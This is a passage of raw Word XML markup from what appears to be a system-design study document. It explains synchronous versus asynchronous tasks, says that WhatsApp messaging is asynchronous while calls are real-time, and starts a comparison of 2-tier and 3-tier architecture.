        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695D8D9D" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="450EAB42" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="0EEC3C2F" w14:textId="77777777" w:rsidTr="00704C53">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73D5B461" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Money debit/credit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6875EC04" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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ynchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5BD3A2F0" w14:textId="77777777" w:rsidTr="00704C53">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17CD8BAD" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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ending notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="437432F4" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="0F38B124" w14:textId="77777777" w:rsidTr="00704C53">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="611ECB65" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Logging/Auditing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="756DC558" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="6CF2BFF5" w14:textId="77777777" w:rsidTr="00704C53">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CF06269" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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Fraud detection post-check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CFC0FB0" w14:textId="77777777" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="209362E3" w14:textId="3464D324" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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0BF796E7">
          <v:rect id="_x0000_i3633" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D774FD" w14:textId="1089981F" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="006F290C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="900" w:name="_Toc196308380"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Is WhatsApp Synchronous or Asynchronous</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="900"/>
    </w:p>
    <w:p w14:paraId="6C1D5D88" w14:textId="1AB5C0AC" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B3" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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WhatsApp</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the core mechanism for messaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A1AB9" w14:textId="77777777" w:rsidR="00B328B3"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B63D3C9">
          <v:rect id="_x0000_i3634" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C000FD6" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B3"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Why Asynchronous?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096C5C69"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When </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>User A</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends a message to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>User B</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D21EF8E" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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message is sent to WhatsApp servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFD209" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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It's </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queued and delivered</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to User B </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when they're online</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405966A1" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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No need for User B to be instantly available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C313A4" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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User A doesn’t wait for a response to continue — </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D55CA9" w14:textId="77777777" w:rsidR="00B328B3"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C0A1BB">
          <v:rect id="_x0000_i3635" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12509052" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B3"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How it wor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78"/>
        <w:gridCol w:w="3789"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3D71D1A5" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37BD53DC" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7546EFFE" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="15FFD69E" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52846FD9"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User sends a message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DC3A78E"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ent via internet (asynchronously)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="7642FD4D" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D931AF"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Message reaches server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3153C896"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tored until recipient is available</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1B9083C6" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02FC78E0"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Delivery status (</w:t>
            </w:r>
            <w:r w:rsidRPr="00617E2C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
            <w:r w:rsidRPr="00617E2C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00617E2C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✓✓</w:t>
            </w:r>
            <w:r w:rsidRPr="00617E2C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00617E2C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✓✓✓</w:t>
            </w:r>
            <w:r w:rsidRPr="00617E2C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AB5CD44"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cknowledges delivery &amp; read, also async</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="7EAB525A" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="121BF3C9"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Recipient reads/responds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556429FA"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t their convenience — no blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D83548A" w14:textId="77777777" w:rsidR="00B328B3"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C09695D">
          <v:rect id="_x0000_i3636" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="024EDFC5" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B3"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Asynchronous Features in WhatsApp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB2D6F"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Offline message handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273ABCE4"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Push notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136D3ED6"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Multimedia sharing (uploads/downloads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61106092"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Group chats with multiple recipients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C55B028"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Web/Desktop sync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E53D6AF" w14:textId="77777777" w:rsidR="00B328B3"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01BD3E1">
          <v:rect id="_x0000_i3637" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="415FBD7C" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B3"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62"/>
        <w:gridCol w:w="2271"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1DB9CCBD" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10F50395" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22973430" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B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Sync/Async</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="48D6F283" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BF02415"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Messaging core</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A52706"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sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="64EA0F0C" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7922638D"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Media uploads/downloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="375221DE"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sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="14C46B63" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0250318E"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lastRenderedPageBreak/>
              <w:t>Typing indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5989C12B"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sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="0FF2AA40" w14:textId="77777777" w:rsidTr="00B328B3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E587A7F"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Video/Voice call</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3360498E"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ynchronous (Real-time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73C82746" w14:textId="0B8E9F59" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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4A0060CE">
          <v:rect id="_x0000_i3638" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B55C7BD" w14:textId="773301A7" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00B5508A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="901" w:name="_Toc196308381"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between 2 Tier and 3 Tier Architecture</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="901"/>
    </w:p>
    <w:p w14:paraId="16DFD48B" w14:textId="69D510B1" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B3" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Here’s a clear breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>difference between 2-tier and 3-tier architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E9A560" w14:textId="77777777" w:rsidR="00B328B3"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6E6CE71">
          <v:rect id="_x0000_i3639" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="557A1549" w14:textId="77777777" w:rsidR="00B328B3" w:rsidRPr="00617E2C" w:rsidRDefault="00B328B3"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2-Tier Architecture (Client–Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F8150"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tructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760B433"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lient (Presentation + Business Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EDF614"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erver (Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B05FFCE"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
